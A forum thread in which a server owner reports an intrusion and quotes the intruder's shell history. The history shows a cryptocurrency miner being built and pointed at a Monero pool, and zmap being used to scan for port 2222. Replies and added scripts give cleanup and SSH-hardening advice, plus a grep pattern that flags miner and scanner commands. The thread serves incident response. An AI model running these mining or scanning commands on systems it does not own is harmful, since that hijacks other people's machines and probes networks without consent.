I have been running an Ubuntu Server 14.04 LTS, mainly for Samba as a file server. The server runs fine unattended, so I do not need to log in to it for several days. When I logged into the server today, I found some suspicious activity in the command history. While searching the web for the commands used, I came to know it's something about cryptocurrency / bitcoins etc. I found the following in the command history:

Code:
cd /usr/local/games
ls
mkdir miner
clear
cd miner
ls
clear
sudo apt-get install -y git automake pkg-config build-essential libcurl4-openssl-dev
git clone https://github.com/wolf9466/cpuminer-multi
cd cpuminer-multi
./autogen.sh
CFLAGS="-march=native" ./configure
make
./minerd -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560
cat /proc/cpuinfo
./configure --disable-aes-ni
make
./minerd -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560

Code:
wget https://sourceforge.net/projects/cpuminer/files/pooler-cpuminer-2.4.4-linux-x86_64.tar.gz
tar xvf pooler-cpuminer-2.4.4-linux-x86_64.tar.gz
./minerd -a cryptonight

Code:
apt-get install zmap
zmap -p 2222

While checking the logs, I found all log files in /var/log are of 0 size, with a datestamp of November 25. As a precaution, I stopped the port forward for port 22 on my firewall and changed passwords. Kindly guide me on what I should do further.

~Dipesh
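Two of the things the post describes (zero-byte files under /var/log and miner-related commands in the shell history) can be checked mechanically. The script below is an added example, not something from the thread; it builds a throwaway directory that imitates what the poster found, then runs the two checks against it. The grep pattern is an assumption drawn only from the commands quoted above, and on a real system you would point the functions at /var/log and the user's history file instead of the sample.

```shell
#!/bin/sh
# Added triage example (not from the original thread). Two read-only checks
# for the indicators the poster described, run against constructed sample data.

# Print regular files of size zero under the given directory, one per line.
find_empty_logs() {
    find "$1" -type f -size 0 | sort
}

# Print history lines that mention the tools seen in the post. The pattern is
# an assumption based only on the commands quoted there, not a general signature.
flag_history() {
    grep -E 'minerd|cpuminer|stratum[+]tcp|zmap' "$1"
}

# Number of lines flag_history reports for a history file.
count_flagged() {
    flag_history "$1" | wc -l | tr -d ' '
}

# Constructed sample data (not real server output): two empty logs, one
# non-empty log, and a short history file resembling the poster's.
make_sample() {
    d=$(mktemp -d)
    mkdir -p "$d/var/log"
    : > "$d/var/log/auth.log"          # zero bytes, like the poster's logs
    : > "$d/var/log/syslog"
    printf 'normal entry\n' > "$d/var/log/kern.log"
    cat > "$d/bash_history" <<'EOF'
ls
cd miner
./minerd -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560
apt-get install zmap
zmap -p 2222
exit
EOF
    printf '%s\n' "$d"
}

SAMPLE=$(make_sample)
echo "Empty log files:"
find_empty_logs "$SAMPLE/var/log"
echo "Suspicious history lines:"
flag_history "$SAMPLE/bash_history"
```

Empty log files by themselves only tell you that the logs are gone, not who emptied them; the history file is also trivially editable by whoever ran those commands, so both checks are hints for triage rather than proof, which is why the replies below still recommend rebuilding.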
If you suspect the server has been compromised, the only thing you can do is set it up anew. You can't trust it anymore until then.
Restore to an older image made before this intrusion happened. Then, change the SSH login method to key-only.
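Key-only SSH login comes down to a few sshd_config settings, and it is easy to check whether a file actually has them. The script below is an added example (not from the thread): it writes two constructed sshd_config fragments, one with password logins still enabled and one hardened, and a function that reports the effective values. It assumes OpenSSH's documented behaviour that the first occurrence of a keyword wins and that PasswordAuthentication, PubkeyAuthentication and ChallengeResponseAuthentication default to yes when absent.

```shell
#!/bin/sh
# Added example (not from the original thread): audit an sshd_config file for
# key-only login. Returns 0 only when password-based logins are disabled.

# Effective value of one keyword: first occurrence wins (sshd semantics),
# commented lines are skipped because $1 would start with '#', and the
# default given as $3 applies when the keyword is absent.
sshd_value() {
    awk -v key="$2" -v def="$3" '
        tolower($1) == key && !seen { v = tolower($2); seen = 1 }
        END { print (v == "" ? def : v) }' "$1"
}

# Print the three settings and return 0 for key-only, 1 otherwise.
# ChallengeResponseAuthentication must also be "no": with PAM it can still
# prompt for a password even when PasswordAuthentication is off.
check_key_only() {
    pw=$(sshd_value "$1" passwordauthentication yes)
    pk=$(sshd_value "$1" pubkeyauthentication yes)
    cr=$(sshd_value "$1" challengeresponseauthentication yes)
    printf 'PasswordAuthentication=%s PubkeyAuthentication=%s ChallengeResponseAuthentication=%s\n' \
        "$pw" "$pk" "$cr"
    [ "$pw" = "no" ] && [ "$pk" = "yes" ] && [ "$cr" = "no" ]
}

# Constructed sample configs: the weak one leaves password logins on.
write_samples() {
    d=$(mktemp -d)
    cat > "$d/weak" <<'EOF'
Port 22
#PasswordAuthentication no
PasswordAuthentication yes
ChallengeResponseAuthentication no
EOF
    cat > "$d/hardened" <<'EOF'
Port 22
PubkeyAuthentication yes
PasswordAuthentication no
ChallengeResponseAuthentication no
PermitRootLogin no
EOF
    printf '%s\n' "$d"
}

D=$(write_samples)
for f in weak hardened; do
    if check_key_only "$D/$f"; then
        echo "$f: key-only login"
    else
        echo "$f: password login still possible"
    fi
done
```

Run it against /etc/ssh/sshd_config on the rebuilt server after copying your public key into ~/.ssh/authorized_keys; the function only reads the file, so it is safe to run before restarting sshd.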
If one has an image... but then, that older image might have the same security issue... I still recommend re-setting up everything.